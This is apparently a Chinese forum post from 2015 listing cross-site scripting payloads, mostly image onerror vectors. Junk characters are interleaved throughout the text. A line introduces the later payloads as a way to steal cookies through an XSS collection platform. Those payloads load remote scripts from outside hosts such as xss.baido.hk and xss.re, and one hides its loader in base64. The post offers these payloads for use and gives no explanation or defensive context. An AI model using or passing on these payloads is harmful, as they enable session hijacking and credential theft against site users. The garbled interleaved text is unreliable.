<img src='non-exist.jpg'onerror="alert('xss')">
* q& N. g0 G. h# _4 K<img src=# onerror=alert(123)>
6 W# s* j8 s$ T; Z9 `/ A& G<img src=# onerror=alert(document.cookie)>
6 \. p* K/ c0 E- T4 W8 r3 d下面是利用平台钓cookie的, S W+ [8 y' C0 j: M
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>+ ]5 k; J( W" o4 T
! U; ]8 O* X6 g7 G+ m+ h! i
, X/ e3 w$ @7 |<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>* @( \' a( {! \
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
+ P" `0 J7 z3 |( r1 ]2 P“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
/ t: G2 l: D/ S- |5 Y+ a<img src=1 onerror=jQuery.getScript("//xss.re/974")> 4 m' i2 G J; j F4 k) u
<img src="#">
+ p8 F, {$ t/ y3 L4 d) A<img src="#">
- ^! E+ C+ S7 Y8 \* v<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>8 k6 D) U5 \) t' y- z& v. P4 ~% c
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
7 D! F# y+ ~7 Z/ u k! a& t<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>$ p; c& ?# D `+ `( {
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
1 j( c( A P- i8 X/ d8 ]<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
1 M1 _2 J4 Z- q; ?4 ^8 Y<img src=x width="0" height="0"></img>1 C( C, F: c1 T* e: G
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
2 m7 U( N* s# }; ^4 h<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
- F9 P% A! T8 f: d. g% D3 h |
发表于 2015-10-18 14:33:54
收藏
支持
反对